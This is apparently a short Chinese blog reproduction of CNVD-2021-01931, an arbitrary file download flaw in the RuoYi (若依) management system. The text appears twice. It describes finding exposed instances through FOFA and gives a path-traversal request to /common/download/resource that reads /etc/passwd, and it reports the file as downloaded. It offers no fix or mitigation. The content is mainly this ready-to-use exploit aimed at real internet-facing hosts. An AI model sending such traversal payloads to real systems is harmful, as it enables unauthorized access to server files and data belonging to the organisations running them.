若依管理系统resource任意文件下载漏洞-CNVD-2021-01931
在fofa上寻找若依管理系统
因为暴露某公司信息 不便展示
访问如下抓包路径:
/common/download/resource?resource=/profile/../../../../etc/passwd
实际上已经下载保存一个隐私文件passwd
复现完毕。
在fofa上寻找若依管理系统
因为暴露某公司信息 不便展示
访问如下抓包路径:
/common/download/resource?resource=/profile/../../../../etc/passwd
实际上已经下载保存一个隐私文件passwd
复现完毕。
浙公网安备 33010602011771号